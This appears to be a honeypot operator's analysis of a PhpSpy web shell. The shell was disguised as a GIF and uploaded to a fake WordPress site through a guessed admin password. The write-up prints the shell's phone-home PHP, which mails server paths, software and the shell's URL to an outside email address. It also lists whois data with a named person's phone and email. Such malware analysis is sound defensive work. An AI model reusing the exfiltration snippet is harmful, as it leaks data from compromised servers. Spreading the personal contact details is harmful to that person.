PhpSpy web shell disguised as a GIF file. The file command identifies
the PHP file as GIF image data, version 89a, 8251 x 2573.
Downloaded as an update to the "twentytwelve" theme.
p0f3 identifies the downloader as "Windows NT kernel".
Downloaded via a fake theme update - the WordPress honey pot implements some WordPress features to allow file uploads.
The downloader had logged in to WordPress via a previously guessed password.
2017-11-30T12:24:22-07:00 95.14.68.119 admin
First successful guess of that userID/password:
2017-11-21T16:26:28-07:00 91.200.12.75 admin adminadmin
And isn't this clever:
1059 % nslookup 91.200.12.75
75.12.200.91.in-addr.arpa name = seosemcms14.example.com.
Next login with those credentials:
2017-11-23T15:51:29-07:00 115.28.154.44 admin adminadmin from previous successful guess
This particular example is part of a campaign of 59 accesses that ended up "installing" the malware 4 times.
My Apache access_log file (archive.php.accesses in this repo) shows
that the downloader tried to activate archive.php during the campaign.
I believe that the URLs tried would just get my fake WSO web shell,
so probably a honey pot fail, there.
95.14.68.119 → 95.14.68.119.dynamic.ttnet.com.tr
95.14.0.0/17 is in AS9121 assigned to TurkTelekom
Registrant Name: Baran Delibas
Registrant Organization: Delibas Ltd Sti.
Registrant Street: Bismil, Merkez
Registrant Street: Delibas Bilisim LTD Sti.
Registrant City: Bismil
Registrant State/Province: Diyarbakir
Registrant Postal Code: 21500
Registrant Country: TR
Registrant Phone: +90.5394925905
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: Amadeus155@hotmail.com
Registry Admin ID: Not Available From Registry
Admin Name: Baran Delibas
Admin Organization: Delibas Ltd Sti.
Admin Street: Bismil, Merkez
Admin Street: Delibas Bilisim LTD Sti.
Admin City: Bismil
Admin State/Province: Diyarbakir
Admin Postal Code: 21500
Admin Country: TR
Admin Phone: +90.5394925905
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: Amadeus155@hotmail.com
The HTTP headers show that the downloader has "tr-Tr", Turkish, set as its preferred language.
- Hand edit the 95.14.68.119WiBbOqAyktOt7H316j48NQAAAAU file into dc1.php, mostly changing eval to print
- Execute php dc1.php > dc2.php
Looks like dc2.php is its final form.
PHP code mentions "http://www.dcvi.net", which is 94.23.166.29. whois says dcvi.net
is registered to one Lu JunHua of Shanghai. Wow, what a tangled web.
After de-fanging the PHP, execution and examination in a web browser shows that ultimately, this is an instance of the PhpSpy web shell, slightly customized to have some Turkish labels on things.
I had to change a call to the deprecated function eregi() to stristr() to
get this to run. eregi() was deprecated in PHP 5.3, and removed in 7.0.
That means this sample, as shipped, won't run on PHP 7.0 or later, so
anyone keeping PHP itself up-to-date doesn't really need to worry about this one.
The code has a piece of PHP that phones home:
<?php
$kime="amadeus155@hotmail.com";              // recipient address
$baslik="SadrazaM Server Avcisi V1.0";       // mail subject
// Body: document root, server admin, server software, the shell's own URL,
// and the compromised host name, one per line.
$EL_MuHaMMeD="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."\r\n";
$EL_MuHaMMeD.="Server Admin : ".$_SERVER['SERVER_ADMIN']."\r\n";
$EL_MuHaMMeD.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."\r\n";
$EL_MuHaMMeD.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\r\n";
$EL_MuHaMMeD.="Avlanan Site : " .$_SERVER['HTTP_HOST']."\r\n";
mail($kime, $baslik, $EL_MuHaMMeD);          // send it via the server's own MTA
?>
This is the same email address as the "Admin" and "Tech" email contacts in
the whois info for the IP address.